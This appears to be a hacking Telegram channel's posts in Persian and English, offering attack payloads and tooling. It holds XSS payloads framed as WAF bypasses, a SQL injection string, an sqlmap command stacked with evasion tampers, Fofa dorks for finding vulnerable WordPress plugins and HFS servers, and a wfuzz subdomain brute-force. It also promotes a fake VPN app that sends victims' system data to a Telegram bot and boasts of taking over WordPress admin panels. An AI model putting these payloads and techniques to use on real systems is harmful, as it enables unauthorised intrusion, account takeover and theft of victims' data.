"><input type="hidden" oncontentvisibilityautostatechange="confirm(/Bypassed/)" style="content-visibility:auto">

ارسال اطلاعات سیستم به بات تلگرامی در قالب آپ فیلترشکن💀
ری‌اکشن فراموش نشه👍
Training to send system information in the form of a secret filter breaking application. Don't forget
support and reaction.
Do not forget the reaction👍

password: @erohack0 ‌

Fofa Query :: body="/wp-content/plugins/email-subscribers/" 2-
publicwww : "/wp-content/plugins/email-subscribers/"

Fofa Dork: "HttpFileServer" && server=="HFS 2.3m"

0-3661)%20OR%20MAKE_SET(8165=8165,7677)%20AND%20(4334=4334

sqlmap -u 'site.com/search.cmd?for…' --level=5 --risk=3 --tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes --no-cast --no-escape --dbs --random-agent

ما با استفاده از یک پلاگین وردپرس تونستیم به پنل پیشخوان وردپرس دسترسی پیدا کنیم و صفحه لاگین رو به بات تلگرام ارسال کنیم و یک یوزر با سطح دسترسی ادمین ایجاد کنیم.
Using the WordPress plugin, we were able to access the WordPress counter panel and send the login page to the Telegram bot and create a user with admin access
level.

🌟

برای آپلود آموزش ری‌اکشن فراموش نشه.

👁

React to embed the tutorial.

wfuzz -c -w subdomains -u "FUZZ[.]target" --sc 200,301,301,401 -Z

با استفاده از یک پلاگین ساده تونستیم آدرس صفحه لاگین ادمین رو پیدا کنیم و یک کاربر با سطح دسترسی ادمین ایجاد کنید.

pass: @erohack0

💻Payload: 0-3661)%20OR%20MAKE_SET(8165=8165,7677)%20AND%20(4334=4334 

`'>+<script>alert()</script>`

<Svg Only=1 OnLoad=confirm(atob("Q2xvdWRmbGFyZSBCeXBhc3NlZCA6KQ=="))>